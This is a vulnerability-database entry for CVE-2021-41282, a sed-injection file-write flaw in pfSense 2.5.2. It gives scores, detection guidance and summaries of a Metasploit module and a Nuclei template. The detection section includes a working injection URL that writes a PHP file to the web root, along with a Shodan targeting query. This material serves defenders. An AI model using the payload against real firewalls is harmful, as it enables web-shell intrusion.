CVE-2021-41282
published 2022-03-01CVE-2021-41282: diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The…
PriorityP278high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
87.11%
99.7th percentile
diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (i.e., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pfsense | pfsense | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x3c\x3fphp+var_dump(md5(\x27CVE-2021-41282\x27));unlink(__FILE__)\x3b\x3f\x3e/;w+/usr/local/www/test.php%0a%23↗
- →Monitor HTTP GET requests to /diag_routes.php with an 'isAjax=1' parameter and a 'filter' value containing sed write commands (e.g., ';w+' or newline-encoded '%0a') — this is the injection vector for arbitrary file write. ↗
- →Detect web shell creation under /usr/local/www/ on pfSense hosts — the exploit writes a PHP web shell to this web root via sed injection. ↗
- →Alert on Shodan/FOFA-exposed pfSense login pages being targeted; attacker reconnaissance commonly uses 'http.title:"pfsense - login"' to identify targets. ↗
- →The exploit requires authentication with the 'WebCfg - Diagnostics: Routing tables' privilege; monitor for authenticated low-privilege users accessing /diag_routes.php followed by new PHP files appearing in /usr/local/www/. ↗
- →Look for URL-encoded newline (%0a) followed by a comment character (%23) in the 'filter' parameter of requests to diag_routes.php — this is used to terminate the injected sed command. ↗
- ·Exploitation requires an authenticated session; the attacker must first POST valid credentials to /index.php and obtain a CSRF token (matching regex 'sid:[a-z0-9,;:]+') before the injection request can succeed. ↗
- ·Standard escapeshellarg protections are in place but are insufficient — the injection is sed-specific (not a general shell command injection), so shell-level escaping does not prevent it. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Metasploit
pfSense Diag Routes Web Shell Upload
metasploit·CVSS 8.8
CVE-2021-41282 [HIGH] pfSense Diag Routes Web Shell Upload
pfSense Diag Routes Web Shell Upload
This module exploits an arbitrary file creation vulnerability in the pfSense HTTP interface (CVE-2021-41282). The vulnerability affects versions <= 2.5.2 and can be exploited by an authenticated user if they have the "WebCfg - Diagnostics: Routing tables" privilege. This module uses the vulnerability to create a web shell and execute payloads with root privileges.
Nuclei
pfSense - Arbitrary File Write
nuclei·CVSS 8.8
CVE-2021-41282 [HIGH] pfSense - Arbitrary File Write
pfSense - Arbitrary File Write
diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (e.g., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location.
Template:
id: CVE-2021-41282
info:
name: pfSense - Arbitrary File Write
author: cckuailong
severity: high
description: |
diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes
No writeups or analysis indexed.
http://packetstormsecurity.com/files/166208/pfSense-2.5.2-Shell-Upload.htmlhttps://docs.netgate.com/pfsense/en/latest/releases/22-01_2-6-0.htmlhttps://www.shielder.it/advisories/https://www.shielder.it/advisories/pfsense-remote-command-execution/http://packetstormsecurity.com/files/166208/pfSense-2.5.2-Shell-Upload.htmlhttps://docs.netgate.com/pfsense/en/latest/releases/22-01_2-6-0.htmlhttps://www.shielder.it/advisories/https://www.shielder.it/advisories/pfsense-remote-command-execution/
2022-03-01
Published